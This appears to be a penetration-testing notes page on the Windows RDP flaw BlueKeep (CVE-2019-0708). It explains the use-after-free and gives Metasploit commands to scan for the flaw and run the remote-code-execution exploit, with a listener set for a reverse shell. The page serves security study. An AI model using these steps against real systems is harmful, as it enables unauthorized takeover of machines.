CVE-2019-0708: BlueKeep
BlueKeep is a critical RDP vulnerability in Windows systems that allows attackers to remotely execute arbitrary code without authentication, potentially gaining full access to the system and network. Disclosed by Microsoft in May 2019, the exploit targets the RDP protocol, exploiting a flaw in kernel memory. A patch was released on May 14, 2019, but many systems, including Windows XP, Vista, 7, and Server 2008 R2, remained vulnerable at the time. Over 1 million systems worldwide were at risk when the vulnerability was discovered.
Why the Vulnerability Occurs
The vulnerability in question affects Microsoft’s Remote Desktop Services (formerly Terminal Services), which allows users to remotely access a Windows system using the Remote Desktop Protocol (RDP) over port 3389/TCP. The exploit leverages a flaw in the "MCS Connect Initial and GCC Create" request, part of the RDP connection sequence. Specifically, it targets the creation of virtual channels, where a use-after-free vulnerability in the RDP kernel driver (termdd.sys) can be exploited by sending crafted data to the "MS_T120" channel. This results in arbitrary code execution with administrative privileges.
Exploitation
MSF
# enumeration with nmap
sudo nmap -Pn -sV -O [IP]
# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run
# exploitation (only works in x64)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# Exploit may fail for Bad Config. Manually configure targets.
show targets
select target [target name]
runOthers
Last updated